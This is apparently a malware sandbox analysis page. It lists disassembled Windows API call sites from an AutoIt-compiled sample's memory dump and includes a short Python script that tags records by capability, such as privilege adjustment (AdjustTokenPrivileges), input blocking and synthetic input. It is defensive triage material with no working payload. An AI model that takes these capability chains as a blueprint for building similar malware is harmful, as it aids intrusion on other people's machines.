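    "synthetic-input": {"SendInput", "keybd_event", "mouse_event"},
    "user-enumeration": {"GetUserNameW", "GetUserNameA"},
    "process-termination": {"TerminateProcess", "ExitProcess"},
    "error-text-lookup": {"FormatMessageW", "FormatMessageA"},
}


def parse_records(text):
    """Split the listing into records; each starts at an 'APIs' line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "api_id": None, "fuzzy": None, "source": None}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur["apis"].append((m["name"], m["module"], int(m["ref"], 16)))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if key == "API ID":
            cur["api_id"] = val
        elif key == "Instruction Fuzzy Hash":
            cur["fuzzy"] = val
        elif key == "Source File":
            # "<dump>.sdmp, Offset: 00AE0000, based on PE: true"
            parts = [p.strip() for p in val.split(",")]
            src = {"file": parts[0]}
            for p in parts[1:]:
                k, _, v = p.partition(":")
                src[k.strip().lower().replace(" ", "_")] = v.strip()
            src["offset"] = int(src.get("offset", "0"), 16)
            cur["source"] = src
    return records


def call_order(record):
    """API names ordered by call-site address, i.e. their order in the function body."""
    return [name for name, _, ref in sorted(record["apis"], key=lambda a: a[2])]


def classify(record):
    names = {name for name, _, _ in record["apis"]}
    return {label for label, apis in CAPABILITIES.items() if names & apis}


def triage(text):
    """One summary row per record: API ID, ordered chain, labels, fuzzy hash."""
    return [
        {
            "api_id": rec["api_id"],
            "chain": " -> ".join(call_order(rec)),
            "labels": sorted(classify(rec)),
            "fuzzy": rec["fuzzy"],
        }
        for rec in parse_records(text)
    ]


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(f"{row['api_id']:<36} {row['chain']:<58} {row['labels']}")
```

Treat the labels as a grouping aid, not a verdict: the GetCurrentProcess, TerminateProcess, ExitProcess chain is typically the shape of CRT exit or abort code and says nothing about the sample on its own, whereas the AdjustTokenPrivileges and SendInput/keybd_event chains are the records worth opening in the memory dump at the listed call-site addresses.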
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B41B48), ref: 00B41A20
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00B41B48), ref: 00B41A35
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
APIs
• BlockInput.USER32(00000001), ref: 00B5F51A
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00B4ECC7
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00B0075E), ref: 00B00D4A
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
• DeleteObject.GDI32(00000000), ref: 00B6358D
• DeleteObject.GDI32(00000000), ref: 00B635A0
• DestroyWindow.USER32 ref: 00B635AF
• GetDesktopWindow.USER32 ref: 00B635CA
• GetWindowRect.USER32(00000000), ref: 00B635D1
• SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00B63700
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00B6370E
• CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B63755
• GetClientRect.USER32(00000000,?), ref: 00B63761
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B6379D
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B637BF
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B637D2
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B637DD
• GlobalLock.KERNEL32(00000000), ref: 00B637E6
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B637F5
• GlobalUnlock.KERNEL32(00000000), ref: 00B637FE
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B63805
• GlobalFree.KERNEL32(00000000), ref: 00B63810
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B63822
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00B80C04,00000000), ref: 00B63838
• GlobalFree.KERNEL32(00000000), ref: 00B63848
• CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00B6386E
• SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00B6388D
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B638AF
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B63A9C
Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                    • Opcode ID: c602520cbae7b86a20008a52a6db4d4ded58d0cee2167bb4371f615ee95950a9
                                                                                                                                                                                                                                                                                    • Instruction ID: a170baeb7a0cde0f1c03829ba718deed7c15ac267526e1a00cdca49e4c3d1b98
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c602520cbae7b86a20008a52a6db4d4ded58d0cee2167bb4371f615ee95950a9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9024972900205AFDB14DF65CD89EAE7BF9EF48750F048158F919AB2A1CB74EE41CB60
APIs
• SetTextColor.GDI32(?,00000000), ref: 00B77B67
• GetSysColorBrush.USER32(0000000F), ref: 00B77B98
• GetSysColor.USER32(0000000F), ref: 00B77BA4
• SetBkColor.GDI32(?,000000FF), ref: 00B77BBE
• SelectObject.GDI32(?,?), ref: 00B77BCD
• InflateRect.USER32(?,000000FF,000000FF), ref: 00B77BF8
• GetSysColor.USER32(00000010), ref: 00B77C00
• CreateSolidBrush.GDI32(00000000), ref: 00B77C07
• FrameRect.USER32(?,?,00000000), ref: 00B77C16
• DeleteObject.GDI32(00000000), ref: 00B77C1D
• InflateRect.USER32(?,000000FE,000000FE), ref: 00B77C68
• FillRect.USER32(?,?,?), ref: 00B77C9A
• GetWindowLongW.USER32(?,000000F0), ref: 00B77CBC
  • Part of subcall function 00B77E22: GetSysColor.USER32(00000012), ref: 00B77E5B
  • Part of subcall function 00B77E22: SetTextColor.GDI32(?,00B77B2D), ref: 00B77E5F
  • Part of subcall function 00B77E22: GetSysColorBrush.USER32(0000000F), ref: 00B77E75
  • Part of subcall function 00B77E22: GetSysColor.USER32(0000000F), ref: 00B77E80
  • Part of subcall function 00B77E22: GetSysColor.USER32(00000011), ref: 00B77E9D
  • Part of subcall function 00B77E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B77EAB
  • Part of subcall function 00B77E22: SelectObject.GDI32(?,00000000), ref: 00B77EBC
  • Part of subcall function 00B77E22: SetBkColor.GDI32(?,?), ref: 00B77EC5
  • Part of subcall function 00B77E22: SelectObject.GDI32(?,?), ref: 00B77ED2
  • Part of subcall function 00B77E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00B77EF1
  • Part of subcall function 00B77E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B77F08
  • Part of subcall function 00B77E22: GetWindowLongW.USER32(?,000000F0), ref: 00B77F15
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
• String ID:
• API String ID: 4124339563-0
• Opcode ID: 2f5ae56e71a1410b44ba93a8ef9829aafe01d12af90081d485a4e4b9e47b81de
• Instruction ID: 013ca7b34afd91763716e66515016e33f36512a9c47f12f1d320f8473fd833f4
• Opcode Fuzzy Hash: 2f5ae56e71a1410b44ba93a8ef9829aafe01d12af90081d485a4e4b9e47b81de
• Instruction Fuzzy Hash: F7A17D72108301AFD7119F64DC48A6BBBF9FF48360F104A19F96AA71E0DB71E984CB91
APIs
• DestroyWindow.USER32(?,?), ref: 00AE16B4
• SendMessageW.USER32(?,00001308,?,00000000), ref: 00B22B07
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B22B40
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B22F85
  • Part of subcall function 00AE1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AE1488,?,00000000,?,?,?,?,00AE145A,00000000,?), ref: 00AE1865
• SendMessageW.USER32(?,00001053), ref: 00B22FC1
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B22FD8
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00B22FEE
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00B22FF9
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
• String ID: 0
• API String ID: 2760611726-4108050209
• Opcode ID: 77f851a822858f0a61eb088ff366c0d49de4e0673dc324d298ea03792e31f101
• Instruction ID: bc7851090d8b42a5fb3269ea210701850c5e92afb67740d8b72d1f9a7a4f3b9f
• Opcode Fuzzy Hash: 77f851a822858f0a61eb088ff366c0d49de4e0673dc324d298ea03792e31f101
• Instruction Fuzzy Hash: 8512AB30200261AFD725DF14E999BAAB7F1FF44300F1846A9F49DDB661CB71E882DB91
APIs
• DestroyWindow.USER32(00000000), ref: 00B6319B
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B632C7
• SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00B63306
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00B63316
• CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00B6335D
• GetClientRect.USER32(00000000,?), ref: 00B63369
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00B633B2
                                                                                                                                                                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B633C1
                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00B633D1
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00B633D5
                                                                                                                                                                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00B633E5
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B633EE
                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00B633F7
                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B63423
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B6343A
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00B6347A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B6348E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B6349F
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00B634D4
                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00B634DF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B634EA
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00B634F4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                    • Opcode ID: 90ca39ed83326c4e09aab33e478d29ef3b6e031b561d5ebc9383a8c082a3496c
                                                                                                                                                                                                                                                                                    • Instruction ID: 3ce50040127b6b70dbc6dd33f3263a65e78a5949e429389357be62fefc4df05b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90ca39ed83326c4e09aab33e478d29ef3b6e031b561d5ebc9383a8c082a3496c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44B13C71A00215AFEB14DFA9CD49FAEBBF9EF08750F004654F915A72A0DBB4AD40CB94
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00B55532
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00B7DC30,?,\\.\,00B7DCD0), ref: 00B5560F
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00B7DC30,?,\\.\,00B7DCD0), ref: 00B5577B
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                    • Opcode ID: 352575474a86d91bf196482948c9b908f54b1c13ccc4db68a5f192cb0854b78b
                                                                                                                                                                                                                                                                                    • Instruction ID: 761a9e4115cb29b1fe54935ed6611509acf03685bbbc466e7065023f1f44dfff
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 352575474a86d91bf196482948c9b908f54b1c13ccc4db68a5f192cb0854b78b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9061E03078CA45DBC734DF24CEA1A7877E0EF19353F2040E5E806AB261DA21AD0ADB51
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00B71BC4
                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00B71BD9
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00B71BE0
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B71C35
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00B71C55
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B71C89
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B71CA7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B71CB9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00B71CCE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00B71CE1
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 00B71D3D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00B71D58
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00B71D6C
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B71D84
                                                                                                                                                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00B71DAA
                                                                                                                                                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00B71DC4
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 00B71DDB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00B71E46
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: b14b1170eacb6f318965fc6a5631b74e51db0cf8ad86643fab65999107087274
• Instruction ID: f52cc4339f3288fddbb048b1ac9a19ca77596a486f9651e9d063f55e2a11d88f
• Opcode Fuzzy Hash: b14b1170eacb6f318965fc6a5631b74e51db0cf8ad86643fab65999107087274
• Instruction Fuzzy Hash: BBB1AF71604341AFD714DF68C984B6ABBE5FF84350F00895CF9AD9B2A1CB31E945CBA2
APIs
• CharUpperBuffW.USER32(?,?), ref: 00B70D81
• _wcslen.LIBCMT ref: 00B70DBB
• _wcslen.LIBCMT ref: 00B70E25
• _wcslen.LIBCMT ref: 00B70E8D
• _wcslen.LIBCMT ref: 00B70F11
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B70F61
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B70FA0
  • Part of subcall function 00AFFD52: _wcslen.LIBCMT ref: 00AFFD5D
  • Part of subcall function 00B42B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B42BA5
  • Part of subcall function 00B42B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B42BD7
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 1103490817-719923060
• Opcode ID: f5399c52fb2900c62120cc3fe525b00acb23e7e0f45daa17235d567cb8ea21b3
• Instruction ID: 0561694a2d5663fb97fc898600c6d48763e9b99a8fe7982eb9e29125d75e383d
• Opcode Fuzzy Hash: f5399c52fb2900c62120cc3fe525b00acb23e7e0f45daa17235d567cb8ea21b3
• Instruction Fuzzy Hash: 1EE1C1326183419FC714EF28C99186AB3E1FF84314B1489ADF8AA9B7A1DB30ED45CB51
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AE25F8
• GetSystemMetrics.USER32(00000007), ref: 00AE2600
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AE262B
• GetSystemMetrics.USER32(00000008), ref: 00AE2633
• GetSystemMetrics.USER32(00000004), ref: 00AE2658
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AE2675
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AE2685
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AE26B8
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AE26CC
• GetClientRect.USER32(00000000,000000FF), ref: 00AE26EA
• GetStockObject.GDI32(00000011), ref: 00AE2706
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE2711
  • Part of subcall function 00AE19CD: GetCursorPos.USER32(?), ref: 00AE19E1
  • Part of subcall function 00AE19CD: ScreenToClient.USER32(00000000,?), ref: 00AE19FE
  • Part of subcall function 00AE19CD: GetAsyncKeyState.USER32(00000001), ref: 00AE1A23
  • Part of subcall function 00AE19CD: GetAsyncKeyState.USER32(00000002), ref: 00AE1A3D
• SetTimer.USER32(00000000,00000000,00000028,00AE199C), ref: 00AE2738
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 3cf703903654060ecf51b704ba572d7f40091c5742aaf0b3499b446eca654ca6
• Instruction ID: eb3f8f647f38cb9a8f11ae7ade9cd35589793f1a91d3d780923977bd9b7928c7
• Opcode Fuzzy Hash: 3cf703903654060ecf51b704ba572d7f40091c5742aaf0b3499b446eca654ca6
• Instruction Fuzzy Hash: 67B17C31A002099FDB14DFA8DD85BAE7BF5FF48714F104269FA5AAB290DB74E940CB50
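The "APIs" blocks above are the disassembler's view of each function's call sites, with message IDs and flags shown as raw hex. When triaging a report like this one it helps to resolve those constants before deciding whether a function is AutoIt runtime code (the ControlListView helper, the "AutoIt v3 GUI" window creation, the window-station DACL fixup that follows) or payload logic. The parser below is an added example written for this page; it is not Joe Sandbox's code and not code from the analysed sample. The input lines are copied from this listing (including a few from the ADVAPI32 block further down), the constant values are taken from the Windows SDK headers, and the classification tags at the end are a heuristic of the example's own, not a Joe Sandbox signature.

```python
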